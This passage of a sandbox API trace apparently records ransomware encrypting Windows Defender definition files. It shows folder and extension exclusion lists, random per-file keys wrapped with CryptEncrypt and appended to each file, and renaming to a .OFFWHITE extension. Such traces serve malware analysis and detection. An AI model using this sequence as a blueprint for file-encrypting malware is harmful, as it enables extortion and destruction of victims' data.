ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0146.950] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.950] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0146.950] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.950] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.950] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0146.950] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0146.950] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="...") returned 1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="windows") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="$recycle.bin") returned 1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="rsa") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="ntuser.dat") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="programdata") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="appdata") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="program files") returned -1 [0146.950] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="program files (x86)") returned -1 [0146.950] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" [0146.950] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0146.950] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" [0146.951] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" [0146.951] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" [0146.951] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0146.951] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.951] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0146.951] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.951] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.951] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fd91f9, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fd91f9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x12c4d000, ftLastWriteTime.dwHighDateTime=0x1cb85c9, nFileSizeHigh=0x0, nFileSizeLow=0xb17190, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="mpasbase.vdm", cAlternateFileName="")) returned 1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2=".") returned 1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="..") returned 1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="...") returned 1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="windows") returned -1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="$recycle.bin") returned 1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="rsa") returned -1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="ntuser.dat") returned -1 [0146.951] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="programdata") returned -1 [0146.952] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="appdata") returned 1 [0146.952] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="program files") returned -1 [0146.952] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="program files (x86)") returned -1 [0146.952] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" [0146.952] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="mpasbase.vdm" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" [0146.952] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.952] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.952] PathFindExtensionW (pszPath="mpasbase.vdm") returned=".vdm" [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".exe") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".log") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".cab") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".cmd") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".com") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".cpl") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".ini") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".dll") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".url") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".ttf") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".mp3") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".pif") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".mp4") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".OFFWHITE") returned 1 [0146.952] lstrcmpiW (lpString1=".vdm", lpString2=".msi") returned 1 [0146.952] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0146.952] GetProcessHeap () returned 0x500000 [0146.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ad8 [0146.953] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.977] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=11628944) returned 1 [0146.977] GetProcessHeap () returned 0x500000 [0146.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0146.978] GetProcessHeap () returned 0x500000 [0146.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0146.978] GetProcessHeap () returned 0x500000 [0146.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0146.978] GetProcessHeap () returned 0x500000 [0146.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0146.978] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.978] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.978] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0146.978] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.978] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.978] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0146.978] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.978] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.978] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.978] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.979] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.979] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb17190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.979] SetLastError (dwErrCode=0x0) [0146.979] WriteFile (in: hFile=0x218, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0147.004] GetLastError () returned 0x0 [0147.004] GetLastError () returned 0x0 [0147.004] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb17290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.004] WriteFile (in: hFile=0x218, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0147.005] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb17390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.005] WriteFile (in: hFile=0x218, lpBuffer=0x526ad8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x526ad8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0147.005] GetProcessHeap () returned 0x500000 [0147.005] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0147.005] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.005] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x927c0, lpOverlapped=0x0) returned 1 [0147.075] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.075] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x927c0, lpOverlapped=0x0) returned 1 [0147.077] GetProcessHeap () returned 0x500000 [0147.077] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0147.081] CloseHandle (hObject=0x218) returned 1 [0147.081] GetProcessHeap () returned 0x500000 [0147.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0147.081] GetProcessHeap () returned 0x500000 [0147.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0147.081] GetProcessHeap () returned 0x500000 [0147.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0147.081] GetProcessHeap () returned 0x500000 [0147.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0147.081] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" [0147.081] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.OFFWHITE" [0147.082] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.offwhite")) returned 1 [0147.083] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fff35a, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x6da22700, ftLastWriteTime.dwHighDateTime=0x1cb8783, nFileSizeHigh=0x0, nFileSizeLow=0x52d90, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="mpasdlta.vdm", cAlternateFileName="")) returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2=".") returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="..") returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="...") returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="windows") returned -1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="$recycle.bin") returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="rsa") returned -1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="ntuser.dat") returned -1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="programdata") returned -1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="appdata") returned 1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="program files") returned -1 [0147.083] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="program files (x86)") returned -1 [0147.083] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" [0147.083] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="mpasdlta.vdm" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" [0147.083] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.083] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.083] PathFindExtensionW (pszPath="mpasdlta.vdm") returned=".vdm" [0147.083] lstrcmpiW (lpString1=".vdm", lpString2=".exe") returned 1 [0147.083] lstrcmpiW (lpString1=".vdm", lpString2=".log") returned 1 [0147.083] lstrcmpiW (lpString1=".vdm", lpString2=".cab") returned 1 [0147.083] lstrcmpiW (lpString1=".vdm", lpString2=".cmd") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".com") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".cpl") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".ini") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".dll") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".url") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".ttf") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".mp3") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".pif") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".mp4") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".OFFWHITE") returned 1 [0147.084] lstrcmpiW (lpString1=".vdm", lpString2=".msi") returned 1 [0147.084] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.084] GetProcessHeap () returned 0x500000 [0147.084] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ae8 [0147.084] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0147.086] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=339344) returned 1 [0147.086] GetProcessHeap () returned 0x500000 [0147.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0147.086] GetProcessHeap () returned 0x500000 [0147.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0147.086] GetProcessHeap () returned 0x500000 [0147.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0147.086] GetProcessHeap () returned 0x500000 [0147.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0147.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.087] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.087] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0147.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.087] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.087] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0147.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.087] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.087] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295cf90*=0x100) returned 1 [0147.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.087] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.087] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0147.087] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x52d90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.088] SetLastError (dwErrCode=0x0) [0147.088] WriteFile (in: hFile=0x218, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0147.091] GetLastError () returned 0x0 [0147.091] GetLastError () returned 0x0 [0147.091] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x52e90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.091] WriteFile (in: hFile=0x218, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0147.092] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x52f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.092] WriteFile (in: hFile=0x218, lpBuffer=0x526ae8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x526ae8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0147.092] GetProcessHeap () returned 0x500000 [0147.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x52d90) returned 0x2960048 [0147.092] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.092] ReadFile (in: hFile=0x218, lpBuffer=0x2960048, nNumberOfBytesToRead=0x52d90, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295d1c0*=0x52d90, lpOverlapped=0x0) returned 1 [0147.114] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.115] WriteFile (in: 